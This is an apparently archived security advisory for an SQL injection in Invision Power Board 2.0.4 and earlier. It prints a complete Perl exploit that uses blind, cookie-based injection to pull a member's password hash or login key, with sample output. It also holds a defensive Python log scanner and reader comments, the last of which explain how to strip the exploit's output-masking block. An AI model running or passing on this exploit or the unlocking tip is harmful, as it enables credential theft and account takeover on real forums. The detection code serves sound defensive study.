Invision Power Board (IPB) is "a professional forum system that has been built from the ground up with speed and security in mind, taking advantage of object oriented code, highly-optimized SQL queries, and the fast PHP engine. A comprehensive administration control panel is included to help you keep your board running smoothly. Moderators will also enjoy the full range of options available to them via built-in tools and moderators control panel. Members will appreciate the ability to subscribe to topics, send private messages, and perform a host of other options through the user control panel. It is used by millions of people over the world".
An SQL injection vulnerability found in Invision Power Board allows attackers to add, change, delete and view records in the database.
Credit:
The information has been provided by RusH.
Vulnerable Systems:
* Invision Power Board 2.0.4 and prior
Exploit:
#!/usr/bin/perl
## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?('member_login_key'):('password');
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
while(1)
{
    if(&found(47,58)==0) { &found(96,122); }
    $char = $i;
    if ($char=="0")
    {
        if(length($allchar) > 0){
            print qq{\b\b DONE ]
MEMBER ID : $member_id
};
            print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
            print $allchar."\r\n";
        }
        else
        {
            print "\b\b FAILED ]";
        }
        exit();
    }
    else
    {
        $allchar .= chr(42);
    }
    $s_num++;
}
sub found($$)
{
    my $fmin = $_[0];
    my $fmax = $_[1];
    if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
    $r = int($fmax - ($fmax-$fmin)/2);
    $check = " BETWEEN $r AND $fmax";
    if ( &check($check) ) { &found($r,$fmax); }
    else { &found($fmin,$r); }
}
sub crack($$)
{
    my $cmin = $_[0];
    my $cmax = $_[1];
    $i = $cmin;
    while ($i<$cmax)
    {
        $crcheck = "=$i";
        if ( &check($crcheck) ) { return $i; }
        $i++;
    }
    $i = 0;
    return $i;
}
sub check($)
{
    $n++;
    status();
    $ccheck = $_[0];
    $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
    $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75" . "%62%73%74%72%69%6E%67%28";
    $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
    $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    $nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0" . "%E0%F1%21%20";
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
    printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
        $path, $server, $cmember_id, $pass_hash1, $cmember_id, $pass_hash2, $pass_hash3, $nmalykh);
    while(<$socket>)
    {
        if (/Set-Cookie: session_id=0;/) { return 1; }
    }
    return 0;
}
sub status()
{
    $status = $n % 5;
    if($status==0){ print "\b\b/]"; }
    if($status==1){ print "\b\b-]"; }
    if($status==2){ print "\b\b\\]"; }
    if($status==3){ print "\b\b|]"; }
}
sub usage()
{
    print q(
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]
[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute
targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)
e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
    exit();
}
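The injection described above rides in the pass_hash autologin cookie, which for a legitimate session is nothing more than a 32-character MD5 hex digest. The Python below is an added example, not code from the advisory, from RST/GHC or from IPB, of how a defender can spot this probing in web-server logs: it fully percent-decodes the cookie value (covering the double encoding the script's header mentions for magic_quotes), rejects anything that is not a plain hex digest, and counts per source address how many such autologin requests arrive, since the character-by-character search needs many requests for a single hash. The log line format, the IP addresses and every log line are constructed for the example; the one genuine-looking hash value is the sample output value shown in the script's header.

```python
"""
Detection helper for the IPB pass_hash cookie injection described above.
Added example, not part of the advisory or of IPB; the log format and all
log lines are constructed for illustration.
"""
import re
from collections import Counter
from urllib.parse import unquote

# A genuine pass_hash / member_login_key cookie is an MD5 hex digest:
# exactly 32 lowercase hex characters and nothing else.
MD5_HEX_RE = re.compile(r"^[0-9a-f]{32}$")

# Tokens that never occur in a hex digest but do occur in an injected cookie.
SQL_FRAGMENT_RE = re.compile(r"(?i)\b(or|and|between|substring|ascii|select|union)\b|'|/\*|--")

# Constructed (hypothetical) log format: ip [timestamp] "request line" status "Cookie header"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) "(?P<cookie>[^"]*)"$'
)


def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing, so a double-encoded
    quote (%2527 -> %27 -> ') is inspected in its final form.
    Returns (decoded_value, number_of_rounds_that_changed_it)."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def parse_cookies(header):
    """Split a raw Cookie header into a name -> raw (still encoded) value dict."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, val = part.strip().split("=", 1)
            cookies[name.strip()] = val.strip()
    return cookies


def inspect_pass_hash(raw):
    """Return the reasons a pass_hash cookie value looks injected; [] means clean."""
    decoded, rounds = decode_fully(raw)
    reasons = []
    if not MD5_HEX_RE.match(decoded):
        reasons.append("not a 32-character hex digest")
    if rounds > 1:
        reasons.append("double URL-encoding (magic_quotes bypass pattern)")
    if SQL_FRAGMENT_RE.search(decoded):
        reasons.append("SQL fragment inside cookie value")
    return reasons


def scan_log(lines, burst_threshold=3):
    """Flag lines carrying a bad pass_hash and count, per source IP, how many
    suspicious autologin requests it sent (the blind probe needs many)."""
    findings = []
    per_ip = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        cookies = parse_cookies(m.group("cookie"))
        if "pass_hash" not in cookies:
            continue
        reasons = inspect_pass_hash(cookies["pass_hash"])
        if reasons:
            findings.append((m.group("ip"), reasons))
            if "CODE=autologin" in m.group("req"):
                per_ip[m.group("ip")] += 1
    bursts = {ip: n for ip, n in per_ip.items() if n >= burst_threshold}
    return findings, bursts


def build_line(ip, cookie):
    # Build one constructed log line in the format LOG_RE expects.
    return (f'{ip} [04/May/2006:10:00:01 +0000] '
            f'"GET /ipb/index.php?act=Login&CODE=autologin HTTP/1.0" 200 "{cookie}"')


def build_probe(position, lo, hi):
    # Constructed, double-encoded cookie value in the shape the advisory describes.
    return (f"666%2527%20OR%20(id%3D1%20AND%20ascii(substring(password,{position},1))"
            f"%20BETWEEN%20{lo}%20AND%20{hi})%20/*")


# Constructed sample: one legitimate autologin, then four probes from one source.
SAMPLE_LOG = [build_line("203.0.113.5", "member_id=1; pass_hash=5f4dcc3b5aa765d61d8327deb882cf99")] + [
    build_line("203.0.113.9", f"member_id=1; pass_hash={build_probe(1, lo, hi)}")
    for lo, hi in ((47, 58), (52, 58), (55, 58), (53, 55))
]

if __name__ == "__main__":
    findings, bursts = scan_log(SAMPLE_LOG)
    for ip, reasons in findings:
        print(ip, "->", "; ".join(reasons))
    print("bursting sources:", bursts)
```

The same validation belongs in the application as well as in the log pipeline: a cookie value that is not a 32-character hex string should never reach the SQL layer, and the lookup should use a bound parameter rather than string concatenation, which is what makes the `'` in the decoded cookie harmless.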
Subject: problem
Date: 4 May 2006
From: snipersnaketop.com
the hash appears as ******************
how can it appear as a valid md5 hash

Subject: version
Date: 14 Jun. 2006
From: Mr E
it only works in versions 2.0.4 and below; check the versions.

Subject: Question
Date: 24 Jun. 2006
From: Dragon Hellfire
what do you suggest I use to get the proper hash?

Subject: How
Date: 27 Jun. 2006
From: Justin
How are you supposed to use exploits?

Subject: How
Date: 1 Jul. 2006
From: Dude
How can I put that code up there to use?

Subject: nt
Date: 11 Jul. 2006
From: TheNymf
you must open it with a PERL shell (read about it)
the script is easy - it will tell you what to do
the problem is: it does indeed say *********** as hash.
even with version 2.0.0 ...! so this version of the exploit doesn't seem to work
Greetz

Subject: How
Date: 14 Jul. 2006
From: Sonic
I'm curious as to how to fix the issue or where I can find info on how to fix the issue, besides upgrading IPB.

Subject: help
Date: 2 Aug. 2006
From: rawr
ok it keeps saying failed. can someone please explain what each of the values is (target and member_id)

Subject: rawr
Date: 2 Aug. 2006
From: rawr
nvm, it keeps saying failed... prolly patched :(

Subject: How
Date: 10 Aug. 2006
From: Pr0jectX
the script has a script kiddie block. Find it, remove it and you're done. Learn Perl

Subject: Re: How {Pr0jectX}
Date: 16 Feb. 2007
From: TwztdJustiz
I get the block, in chr(42), ASCII for *, I screw around with Visual Basic all day at work, so I knew that one!... But I've tried everything, even ranging the chr set from chr(0) to chr(127), which is obviously more than I need, but I still can get the hash to pull anything but *s or 0s.

Subject: hash
Date: 3 Jul. 2007
From: electron
my problem is the same
the hash is *****************************

Subject: ...
Date: 21 Nov. 2007
From: Psycho
With the skiddie block ON .. Does it still say if it fails?
Because it either says it fails, or if I turn it on it gives me stars. -_-

Subject: yea ... this is a hard one :D I'm 16 and it took me like 2 hours to figure it out :
Date: 6 Jul. 2008
From: XMi XmiX2 XMimxGmail.sex
the answer is $i